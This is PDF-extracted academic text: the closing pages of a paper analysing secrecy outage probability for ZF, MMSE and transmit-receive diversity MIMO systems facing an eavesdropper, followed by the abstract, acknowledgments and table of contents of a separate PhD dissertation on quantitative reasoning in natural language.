=4 (simu.) MMSE, M t =4, M r =6, M e =4 MMSE, M t =4, M r =6, M e =4 (simu.) ZF, M t =4, M r =8, M e =4 ZF, M t =4, M r =8, M e =4 (simu.) MMSE, M t =4, M r =8, M e =4 MMSE, M t =4, M r =8, M e =4 (simu.) Figure 4 Secrecy outage probability of spatial multiplexing systems with ZF equalization (Pout,ZF) and MMSE equalization (Pout,MMSE). This figure shows the theoretical and simulated secrecy outage curves for the ZF equalization-based and MMSE equalization-based spatial multiplexing systems with different num- bers of antennas at the legitimate receiver (Mr) and fixed numbers of antennas at the transmitter (Mt) and the eavesdropper (Me). The simulation results are labeled with ‘‘simu.’’. Full-size DOI: 10.7717/peerjcs.186/fig-4 Maichalernnukul (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.186 14/21 https://peerj.com https://doi.org/10.7717/peerjcs.186/fig-3 https://doi.org/10.7717/peerjcs.186/fig-4 http://dx.doi.org/10.7717/peerj-cs.186 5For a detailed analysis of the number of flops required for matrix–vector operations such as associated summations and multiplications, readers are referred to Hunger (2007). 0 5 10 15 20 25 30 10 −2 10 −1 10 0 Average SNR at the receiver (dB) S ec re cy o ut ag e pr ob ab ili ty ZF, M t =4, M r =4, M e =6, γ e =3 dB MMSE, M t =4, M r =4, M e =6, γ e =3 dB ZF, M t =4, M r =4, M e =8, γ e =3 dB MMSE, M t =4, M r =4, M e =8, γ e =3 dB ZF, M t =4, M r =4, M e =6, γ e =6 dB MMSE, M t =4, M r =4, M e =6, γ e =6 dB ZF, M t =4, M r =4, M e =8, γ e =6 dB MMSE, M t =4, M r =4, M e =8, γ e =6 dB Figure 5 Pout,ZF versus Pout,MMSE for various Me at fixed Mt and Mr (Mt = Mr = 4). This figure shows the theoretical secrecy outage curves for the ZF equalization-based and MMSE equalization-based spatial mul- tiplexing systems with different numbers of antennas and average SNRs at the eavesdropper (Me and γ̄e), and fixed numbers of antennas at the transmitter (Mt) and the legitimate receiver (Mr). Full-size DOI: 10.7717/peerjcs.186/fig-5 agree well, and both kinds of systems exhibit similar secrecy outage performance. Indeed, the spatial multiplexing system with MMSE equalization achieves lower secrecy outage probability when the number of antennas at the eavesdropper is more than that at the receiver, as illustrated in Fig. 5. In addition, most noteworthy in Eq. (19) is the fact that, when the values of (Mr−Mt) and (Me−Mt) are fixed, the secrecy outage probability of the spatial multiplexing system with ZF equalization remains the same regardless of the value of Mt that is used. This fact is confirmed by Fig. 6, where we plot the simulated secrecy outage curves in the case of Mr−Mt=0,Me−Mt=0 and that of Mr−Mt=2,Me−Mt=4. Figures 7 and 8 verify the asymptotic secrecy outage probability of the spatial multiplexing system with ZF equalization derived in Eqs. (28)–(30) and that of the spatial multiplexing system with MMSE equalization derived in Eqs. (32)–(34), respectively, at a fixed γ̄e (i.e., γ̄e =10 dB). As γ̄r increases, the asymptotic curves tend towards the exact ones for different values of Mt, Mr, and Me. It can also be noticed that the secrecy diversity gains of the two systems are Mr−Mt+1, as predicted by Eqs. (29) and (33), and the corresponding secrecy array gains lessen with growing Me, as predicted by Eqs. (30) and (34). Finally, it is interesting to compare the computational complexity of all three systems. To this end, we express such complexity in terms of the number of floating-point operations (flops), and the relevant calculations are summarized as follows:5 (1) the number of flops Maichalernnukul (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.186 15/21 https://peerj.com https://doi.org/10.7717/peerjcs.186/fig-5 http://dx.doi.org/10.7717/peerj-cs.186 0 5 10 15 20 25 30 10 −3 10 −2 10 −1 10 0 Average SNR at the receiver (dB) S ec re cy o ut ag e pr ob ab ili ty M t =2, M r =2, M e =2 M t =4, M r =4, M e =4 M t =6, M r =6, M e =6 M t =2, M r =4, M e =6 M t =4, M r =6, M e =8 M t =6, M r =8, M e =10 Figure 6 Examples of Pout,ZF with Mt = Mr = Me and that with Mr = Mt +2 and Me = Mt +4. This figure shows the simulated secrecy outage curves for the ZF equalization-based spatial multiplexing system in the case that the numbers of antennas at the transmitter (Mt), the legitimate receiver (Mr), and the eavesdrop- per (Me) are the same, and the case of Mr =Mt+2, Me =Mt+4. Full-size DOI: 10.7717/peerjcs.186/fig-6 0 5 10 15 20 25 30 10 −4 10 −3 10 −2 10 −1 10 0 Average SNR at the receiver (dB) S ec re cy o ut ag e pr ob ab ili ty M t =3, M r =3, M e =3 (exact) M t =3, M r =3, M e =3 (asym.) M t =3, M r =3, M e =6 (exact) M t =3, M r =3, M e =6 (asym.) M t =3, M r =6, M e =6 (exact) M t =3, M r =6, M e =6 (asym.) M t =3, M r =6, M e =12 (exact) M t =3, M r =6, M e =12 (asym.) Figure 7 Comparison of exact and asymptotic secrecy outage probability of spatial multiplexing sys- tem with ZF equalization. This figure shows the exact and asymptotic secrecy outage curves for the ZF equalization-based spatial multiplexing system with different numbers of antennas at the legitimate re- ceiver (Mr) and the eavesdropper (Me), and a fixed number of antennas at the transmitter (Mt). The exact and asymptotic results are labeled with ‘‘exact’’ and ‘‘asym.’’, respectively. Full-size DOI: 10.7717/peerjcs.186/fig-7 Maichalernnukul (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.186 16/21 https://peerj.com https://doi.org/10.7717/peerjcs.186/fig-6 https://doi.org/10.7717/peerjcs.186/fig-7 http://dx.doi.org/10.7717/peerj-cs.186 6In practice, the choice of N depends on the ratio between the magnitude of the second largest eigenvalue of HrH † r and that of the corresponding largest eigenvalue as it dictates the rate of convergence (see Golub & Van Loan (2013), Section 7.3) for more details). 0 5 10 15 20 25 30 10 −4 10 −3 10 −2 10 −1 10 0 Average SNR at the receiver (dB) S ec re cy o ut ag e pr ob ab ili ty M t =3, M r =3, M e =3 (exact) M t =3, M r =3, M e =3 (asym.) M t =3, M r =3, M e =6 (exact) M t =3, M r =3, M e =6 (asym.) M t =3, M r =6, M e =6 (exact) M t =3, M r =6, M e =6 (asym.) M t =3, M r =6, M e =12 (exact) M t =3, M r =6, M e =12 (asym.) Figure 8 Comparison of exact and asymptotic secrecy outage probability of spatial multiplexing sys- tem with MMSE equalization. This figure shows the exact and asymptotic secrecy outage curves for the MMSE equalization-based spatial multiplexing system with different numbers of antennas at the legiti- mate receiver (Mr) and the eavesdropper (Me), and a fixed number of antennas at the transmitter (Mt). The exact and asymptotic results are labeled with ‘‘exact’’ and ‘‘asym.’’, respectively. Full-size DOI: 10.7717/peerjcs.186/fig-8 required to compute zr (via power iteration (Golub & Van Loan, 2013, Section 7.3)), wt, and ze for the transmit-receive diversity system; (2) the number of flops required to compute Wr,ZF and We,ZF for the spatial multiplexing system with ZF equalization; and (3) the number of flops required to compute Wr,MMSE and We,MMSE for the spatial multiplexing system with MMSE equalization. The results are given in Table 1, where N is the number of iterations used in the power iteration method.6 Figure 9 shows the system complexity as a function of Mt for Mt =Mr =Me and for Mr =Me =2Mt. From this figure, we see that the computational complexity of the spatial multiplexing system with ZF equalization is comparable to that of the spatial multiplexing system with MMSE equalization, while the transmit-receive diversity system has the highest computational complexity, even with N =1. CONCLUSION We have presented exact and asymptotic analysis of the secrecy outage probability of the transmit-receive diversity system and spatial multiplexing systems with ZF equalization and MMSE equalization in a Rayleigh-fading MIMO wiretap channel. This asymptotic analysis has shown that the transmit-receive diversity system achieves a secrecy diversity order of MtMr, whereas the two spatial multiplexing systems offer the same secrecy diversity order of Mr−Mt+1. Interestingly, all of these secrecy diversity orders do not rely on Me. Maichalernnukul (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.186 17/21 https://peerj.com https://doi.org/10.7717/peerjcs.186/fig-8 http://dx.doi.org/10.7717/peerj-cs.186 Table 1 System complexity in terms of floating-point operations. This table shows the computational complexity of the transmit-receive diversity system and the spatial multiplexing systems with ZF equaliza- tion and MMSE equalization. System Number of Flops Transmit-Receive Diversity 2MtM 2r +2MtMr+2MtMe+2Mt +(2N −1)M 2r +2NMr+2Me Spatial Multiplexing with ZF 2M 2t +4MtMr+4MtMe−Mr−Me+2 Spatial Multiplexing with MMSE 2M 2t +4MtMr+4MtMe−Mr−Me+4 1 2 3 4 5 6 7 8 9 10 Number of transmit antennas 0 2000 4000 6000 8000 10000 12000 14000 16000 18000 N u m b e r o f flo p s TR, M t =M r =M e , N=1 TR, M t =M r =M e , N=10 ZF, M t =M r =M e MMSE, M t =M r =M e TR, M r =M e =2M t , N=1 TR, M r =M e =2M t , N=10 ZF, M r =M e =2M t MMSE, M r =M e =2M t Figure 9 Comparison of system complexity for Mt = Mr = Me and for Mr = Me = 2Mt. This figure shows the system complexity for the case that the numbers of antennas at the transmitter (Mt), the legiti- mate receiver (Mr), and the eavesdropper (Me) are the same, and the case of Mr =Me =2Mt. Full-size DOI: 10.7717/peerjcs.186/fig-9 Numerical results based on both theoretical analysis and simulations have demonstrated how Mt, Mr, and Me affect the secrecy performance of such MIMO systems. ADDITIONAL INFORMATION AND DECLARATIONS Funding The author received no funding for this work. Competing Interests The author declares there are no competing interests. Maichalernnukul (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.186 18/21 https://peerj.com https://doi.org/10.7717/peerjcs.186/fig-9 http://dx.doi.org/10.7717/peerj-cs.186 Author Contributions • Kiattisak Maichalernnukul conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. Data Availability The following information was supplied regarding data availability: Data is available at GitHub: https://github.com/Secrecy1234/peerj. REFERENCES Bashar S, Ding Z, Li GY. 2011. On secrecy of codebook-based transmission beamforming under receiver limited feedback. IEEE Transactions on Wireless Communications 10(4):1212–1223 DOI 10.1109/TWC.2011.020111.100378. Biglieri E, Calderbank R, Constantinides A, Goldsmith A, Paulraj AJ, Poor HV. 2007. MIMO wireless communications. New York: Cambridge University Press. Bloch M, Barros J, Rodrigues MRD, McLaughlin SW. 2008. Wireless information- theoretic security. IEEE Transactions on Information Theory 54(6):2515–2534 DOI 10.1109/TIT.2008.921908. Chen C-J, Wang L-C. 2007. Performance analysis of scheduling in multiuser MIMO sys- tems with zero-forcing receivers. IEEE Journal on Selected Areas in Communications 25(7):1435–1445 DOI 10.1109/JSAC.2007.070916. Csiszár I, Körner J. 1978. Broadcast channels with confidential messages. IEEE Transac- tions on Information Theory 24(3):339–348 DOI 10.1109/TIT.1978.1055892. Dighe PA, Mallik RK, Jamuar SS. 2003. Analysis of transmit-receive diversity in Rayleigh fading. IEEE Transactions on Communications 51(4):694–703 DOI 10.1109/TCOMM.2003.810871. Dong L, Han Z, Petropulu AP, Poor HV. 2010. Improving wireless physical layer security via cooperating relays. IEEE Transactions on Signal Processing 58(3):1875–1888 DOI 10.1109/TSP.2009.2038412. Ferdinand NS, Da Costa DB, Latva-aho M. 2013. Physical layer security in MIMO OSTBC line-of-sight wiretap channels with arbitrary transmit/receive antenna correlation. IEEE Wireless Communications Letters 2(5):467–470 DOI 10.1109/WCL.2013.052813.130191. Foschini GJ. 1996. Layered space-time architecture for wireless communication in a fading environment when using multi-element antennas. Bell Labs Technical Journal 1(2):41–59 DOI 10.1002/bltj.2015 . Gallager RG. 2008. Principles of digital communication. New York: Cambridge University Press. Goel S, Negi R. 2008. Guaranteeing secrecy using artificial noise. IEEE Transactions on Wireless Communications 7(6):2180–2189 DOI 10.1109/TWC.2008.060848. Maichalernnukul (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.186 19/21 https://peerj.com https://github.com/Secrecy1234/peerj http://dx.doi.org/10.1109/TWC.2011.020111.100378 http://dx.doi.org/10.1109/TIT.2008.921908 http://dx.doi.org/10.1109/JSAC.2007.070916 http://dx.doi.org/10.1109/TIT.1978.1055892 http://dx.doi.org/10.1109/TCOMM.2003.810871 http://dx.doi.org/10.1109/TSP.2009.2038412 http://dx.doi.org/10.1109/WCL.2013.052813.130191 http://dx.doi.org/10.1002/bltj.2015 http://dx.doi.org/10.1109/TWC.2008.060848 http://dx.doi.org/10.7717/peerj-cs.186 Golub GH, Van Loan CF. 2013. Matrix computations. Baltimore: Johns Hopkins University Press. Gradshteyn IS, Ryzhik IM. 2000. Table of integrals, series and products. New York: Academic Press. He F, Man H, Wang W. 2011. Maximal ratio diversity combining enhanced security. IEEE Communications Letters 15(5):509–511 DOI 10.1109/LCOMM.2011.030911.102343. Heath Jr RW, Lozano A. 2018. Foundation of MIMO communication. New York: Cambridge University Press. Hunger R. 2007. Floating point operations in matrix-vector calculus. Technical report. Department of Electrical and Computer Engineering, Munich: Technical University of Munich. Jankiraman M. 2004. Space-time codes and MIMO systems. Boston: Artech House. Jiang Y, Li J, Hager WW. 2005. Uniform channel decomposition for MIMO communications. IEEE Transactions on Signal Processing 53(11):4283–4294 DOI 10.1109/TSP.2005.857052. Jiang Y, Varanasi MK, Li J. 2011. Performance analysis of ZF and MMSE equalizers for MIMO systems: an in-depth study of the high SNR regime. IEEE Transactions on Information Theory 57(4):2008–2026 DOI 10.1109/TIT.2011.2112070. Kalman D. 1984. The maximum and minimum of two numbers using the quadratic formula. College Mathematics Journal 15(4):329–330 DOI 10.2307/2686400. Khisti A, Wornell GW. 2010. Secure transmission with multiple antennas–part II: the MIMOME wiretap channel. IEEE Transactions on Information Theory 56(11):5515–5532 DOI 10.1109/TIT.2010.2068852. Kumar KR, Caire G, Moustakas AL. 2009. Asymptotic performance of linear receivers in MIMO fading channels. IEEE Transactions on Information Theory 55(10):4398–4418 DOI 10.1109/TIT.2009.2027493. Leung-Yan-Cheong SK, Hellman ME. 1978. The Gaussian wire-tap channel. IEEE Transactions on Information Theory 24(4):451–456 DOI 10.1109/TIT.1978.1055917. Lin C-H, Tsai S-H, Lin Y-P. 2014. Secure transmission using MIMO precod- ing. IEEE Transactions on Information Forensics and Security 9(5):801–813 DOI 10.1109/TIFS.2014.2309211. Maaref A, Aïssa S. 2005. Closed-form expressions for the outage and ergodic Shan- non capacity of MIMO MRC systems. IEEE Transactions on Communications 53(7):1092–1095 DOI 10.1109/TCOMM.2005.851564. Maichalernnukul K. 2018. Secrecy capacity analysis of transmit-receive diversity systems. In: Proceedings of the IEEE statistical signal processing workshop. IEEE: Freiburg, Piscataway, 159–163 DOI 10.1109/SSP.2018.8450857. McKay MR. 2006. Random matrix theory analysis of multiple antenna communication systems. PhD dissertation, The University of Sydney, Australia. Mukherjee A, Swindlehurst AL. 2011. Robust beamforming for security in MIMO wiretap channels with imperfect CSI. IEEE Transactions on Signal Processing 59(1):351–361 DOI 10.1109/TSP.2010.2078810. Maichalernnukul (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.186 20/21 https://peerj.com http://dx.doi.org/10.1109/LCOMM.2011.030911.102343 http://dx.doi.org/10.1109/TSP.2005.857052 http://dx.doi.org/10.1109/TIT.2011.2112070 http://dx.doi.org/10.2307/2686400 http://dx.doi.org/10.1109/TIT.2010.2068852 http://dx.doi.org/10.1109/TIT.2009.2027493 http://dx.doi.org/10.1109/TIT.1978.1055917 http://dx.doi.org/10.1109/TIFS.2014.2309211 http://dx.doi.org/10.1109/TCOMM.2005.851564 http://dx.doi.org/10.1109/SSP.2018.8450857 http://dx.doi.org/10.1109/TSP.2010.2078810 http://dx.doi.org/10.7717/peerj-cs.186 Oggier F, Hassibi B. 2011. The secrecy capacity of the MIMO wiretap channel. IEEE Transactions on Information Theory 57(8):4961–4972 DOI 10.1109/TIT.2011.2158487. Ordóñez LG, Palomar DP, Pagès-Zamora A, Fonollosa JR. 2007. High-SNR analytical performance of spatial multiplexing MIMO systems with CSI. IEEE Transactions on Signal Processing 55(11):5447–5463 DOI 10.1109/TSP.2007.896109. Palomar DP, Lagunas MA. 2003. Joint transmit-receive space-time equalization in spatially correlated MIMO channels: a beamforming approach. IEEE Journal on Selected Areas in Communications 21(5):730–743 DOI 10.1109/JSAC.2003.810324. Papoulis A, Pillai SU. 2002. Probability, random variables, and stochastic processes. New York: McGraw-Hill. Poor HV, Schaefer RF. 2017. Wireless physical layer security. Proceedings of the National Academy of Sciences of the United States of America 114(1):19–26 DOI 10.1073/pnas.1618130114. Schaefer RF, Loyka S. 2015. The secrecy capacity of compound Gaussian MIMO wiretap channels. IEEE Transactions on Information Theory 61(10):5535–5552 DOI 10.1109/TIT.2015.2458856. Seethaler D, Artés H, Hlawatsch F. 2004. Dynamic nulling-and-cancelling with near-ML performance. In: Proceedings of the IEEE international conference on acoustics, speech and signal processing. Montreal, 777–780. Seethaler D, Artés H, Hlawatsch F. 2005. Detection techniques for MIMO spatial multiplexing systems. Elektrotechnik und Informationstechnik 122(3):91–96 DOI 10.1007/BF03054042. Smith PJ. 2007. Exact performance analysis of optimum combining with multiple inter- ferers in flat Rayleigh fading. IEEE Transactions on Communications 5(9):1674–1677. Tse D, Viswanath P. 2005. Fundamentals of wireless communications. Cambridge: Cambridge University Press. Wang H-M, Wang C, Ng DWK. 2015. Artificial noise assisted secure transmission under training and feedback. IEEE Transactions on Signal Processing 63(23):6285–6298 DOI 10.1109/TSP.2015.2465301. Wang H-M, Wang C, Ng DWK, Lee MH, Xiao J. 2016a. Artificial noise assisted secure transmission for distributed antenna systems. IEEE Transactions on Signal Processing 64(15):4050–4064 DOI 10.1109/TSP.2016.2558164. Wang H-M, Zheng T-X, Yuan J, Towsley D, Lee MH. 2016b. Physical layer secu- rity in heterogeneous cellular networks. IEEE Transactions on Communications 64(3):1204–1219 DOI 10.1109/TCOMM.2016.2519402. Wyner AD. 1975. The wire-tap channel. The Bell System Technical Journal 54(8):1355–1387 DOI 10.1002/j.1538-7305.1975.tb02040.x. Yang N, Yeoh PL, Elkashlan M, Schober R, Collings IB. 2013. Transmit antenna selection for security enhancement in MIMO wiretap channels. IEEE Transactions on Communications 61(1):144–154 DOI 10.1109/TCOMM.2012.12.110670. Zou Y, Wang X, Shen W. 2013. Physical-layer security with multiuser scheduling in cognitive radio networks. IEEE Transactions on Communications 61(12):5103–5113 DOI 10.1109/TCOMM.2013.111213.130235. Maichalernnukul (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.186 21/21 https://peerj.com http://dx.doi.org/10.1109/TIT.2011.2158487 http://dx.doi.org/10.1109/TSP.2007.896109 http://dx.doi.org/10.1109/JSAC.2003.810324 http://dx.doi.org/10.1073/pnas.1618130114 http://dx.doi.org/10.1109/TIT.2015.2458856 http://dx.doi.org/10.1007/BF03054042 http://dx.doi.org/10.1109/TSP.2015.2465301 http://dx.doi.org/10.1109/TSP.2016.2558164 http://dx.doi.org/10.1109/TCOMM.2016.2519402 http://dx.doi.org/10.1002/j.1538-7305.1975.tb02040.x http://dx.doi.org/10.1109/TCOMM.2012.12.110670 http://dx.doi.org/10.1109/TCOMM.2013.111213.130235 http://dx.doi.org/10.7717/peerj-cs.186 work_xp5ehtk7w5gx5cv7hwqaqf7rvm ---- c© 2017 by Subhro Roy. All rights reserved. REASONING ABOUT QUANTITIES IN NATURAL LANGUAGE BY SUBHRO ROY DISSERTATION Submitted in partial fulfillment of the requirements for the degree of Doctor of Philosophy in Computer Science in the Graduate College of the University of Illinois at Urbana-Champaign, 2017 Urbana, Illinois Doctoral Committee: Professor Dan Roth, Chair Professor Gerald DeJong Associate Professor Julia Hockenmaier Associate Professor Luke Zettlemoyer, University of Washington Abstract Quantitative reasoning involves understanding the use of quantities and numeric relations in text, and reasoning with respect to them. It forms an essential part of everyday interaction. However, little work from the Natural Language Processing community has focused on quantitative reasoning. In this thesis, we investigate the challenges in performing automated quantitative reasoning over natural language text. We formulate several tasks to tackle some of the fundamental problems of quantitative reasoning, and address the problem of developing robust statistical methods for these tasks. We show that standard NLP tools are not sufficient to obtain the abstraction needed for quantitative reasoning; the standard NLP pipeline needs to be extended in various ways. We propose several technical ideas for these extensions. We first look at the problem of detecting and normalizing quantities expressed in free form text, and show that correct detection and normalization can support several simple quantitative inferences. We then focus on numeric relation extraction from sentences, and show that several natural properties of language can be leveraged to effectively extract numeric relations from a sentence. We finally investigate the problem of quantitative reasoning over multiple quantities mentioned across several sentences. We develop a decomposition strategy which allows reasoning over pairs of numbers to be combined effectively to perform global reasoning. We also look at the problem of effectively using math domain knowledge in quantitative reasoning. On this front, we first propose graph representations called “unit dependency graphs”, and show that these graph representations can be used to effectively incorporate dimensional analysis knowledge in quantitative reasoning. Next, we develop a general framework to incor- porate any declarative knowledge into quantitative reasoning. This framework is used to incorporate several mathematical concepts into textual quantitative reasoning, leading to robust reasoning systems. ii To my mom. iii Acknowledgments I consider myself fortunate to have Dan as my research advisor. He took me on as a PhD student when I was a confused theory deserter with no clue about NLP. He had the most encouraging words about my progress, even when I felt frustrated with the lack of results. He always encouraged me to strive for better results, and understand the bigger picture of the research. He has taught me to not only be a better researcher, but also to be a kind and compassionate human being. I would like to thank my committee members: Prof. Gerald DeJong, Prof. Julia Hockenmaier and Prof. Luke Zettlemoyer, from whom I got valuable feedback on my research. I would also like to thank all my internship mentors and collaborators, namely Ming-Wei Chang, Scott Yih, Hannaneh Hajishirzi, Rik Koncel-Kedziorski, Mark Hopkins, JD Chen; I have learnt a lot working with them. Special thanks to my friends Shyam and John; I will miss our long afternoon walks discussing research among other things. I would like to thank Snigdha; her help was instrumental in finishing this thesis on time. I would also like to thank the past and present members of Cogcomp, namely Daniel, Stephen, Haoruo, Vinod, Rajhans, Kai-Wei, Gourab, Nitish, Colin, Shashank (Srivastava and Gupta), Michael, Christos, Parisa, Chen- Tse, Pavan, Yangqiu and Mark. They had gifted me an ideal stimulating environment for research. Also, special thanks to my friends Arka, Arun, Anish, Sangeetha and Mainak, who provided me a lot of support in troubled times. Finally, I would like to thank my family – my mom, dad and brother. My parents left no stone unturned to provide me the best quality education, in spite of facing lots of hardships themselves to make it possible. This thesis could not have been completed without my family’s encouragement, support and love. I wish my mom was here today to see me graduate. Ma, words cannot describe how much I miss you. iv Table of Contents List of Tables . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . viii List of Figures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ix Chapter 1 Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1 1.1 Motivation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1 1.2 Math Word Problems: An Abstraction for Quantitative Reasoning . . . . . . . . . . . . . . . 2 1.3 Challenges in Automated Quantitative Reasoning . . . . . . . . . . . . . . . . . . . . . . . . . 3 1.3.1 Variability of Natural Language Text . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3 1.3.2 Quantity Argument Detection . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4 1.3.3 Reasoning about Multiple Quantities . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5 1.3.4 Incorporating Domain Knowledge . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5 1.4 Contributions of the Thesis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 1.5 Overview of the Thesis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7 Chapter 2 Background . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9 2.1 What is a Structure? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9 2.2 Structured Prediction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9 2.3 Inference in Structured Models . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10 2.4 Learning Structured Prediction Models . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 11 2.4.1 Structural Support Vector Machines . . . . . . . . . . . . . . . . . . . . . . . . . . . . 12 2.5 Discussion and Special Case . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 12 2.6 Structured Prediction with Latent Variables . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13 Chapter 3 Early Work in Quantitative Reasoning . . . . . . . . . . . . . . . . . . . . . . . 14 3.1 Early Algebra and Arithmetic Solvers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 14 3.1.1 STUDENT Program . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 14 3.1.2 Other Arithmetic Word Problem Solvers . . . . . . . . . . . . . . . . . . . . . . . . . . 15 3.2 Solvers for other Domains . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 17 3.3 Recent Advances in Statistical Solvers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 17 Chapter 4 Quantity Entailment . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 19 4.1 Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 19 4.2 Related Work . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 20 4.3 Representing Quantities . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 21 4.4 Extraction of Quantities . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 21 4.4.1 Features . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 23 4.4.2 Mapping Text Segments into QVR . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 23 4.4.3 Extraction of Units . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 24 4.5 Quantity Entailment . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 25 4.5.1 Reasoning Framework . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 26 v 4.5.2 Scope of QE Inference . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 29 4.6 Experimental Study . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 30 4.6.1 Datasets . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 30 4.6.2 Quantity Segmentation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 31 4.6.3 Quantity Entailment . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 32 4.6.4 Currency Range Search . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 33 4.6.5 Qualitative Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 34 4.7 Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 34 Chapter 5 Equation Parsing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 35 5.1 Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 35 5.2 Related Work . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 37 5.3 The Equation Parsing Task . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 37 5.3.1 Equation Parse Representation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 38 5.4 Projectivity . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 40 5.5 Predicting Equation Parse . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 41 5.5.1 Predicting Quantity Trigger List . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 41 5.5.2 Predicting Variable Trigger List . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 42 5.5.3 Predicting Equation Tree . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 44 5.5.4 Alternatives . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 45 5.6 Experimental Results . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 45 5.6.1 Dataset . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 46 5.6.2 Equation Parsing Modules . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 47 5.6.3 Equation Parsing Results . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 48 5.6.4 Error Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 49 5.7 Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 49 Chapter 6 Arithmetic Word Problems . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 50 6.1 Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 50 6.2 Related Work . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 52 6.3 Expression Tree and Problem Decomposition . . . . . . . . . . . . . . . . . . . . . . . . . . . 53 6.4 Mapping Problems to Expression Trees . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 58 6.4.1 Global Inference for Expression Trees . . . . . . . . . . . . . . . . . . . . . . . . . . . 58 6.4.2 Quantity Schema . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 60 6.4.3 Relevance Classifier . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 61 6.4.4 LCA Operation Classifier . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 62 6.5 Experimental Results . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 63 6.5.1 Datasets . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 63 6.5.2 Relevance Classifier . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 65 6.5.3 LCA Operation Classifier . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 65 6.5.4 Global Inference Module . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 66 6.5.5 Discussion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 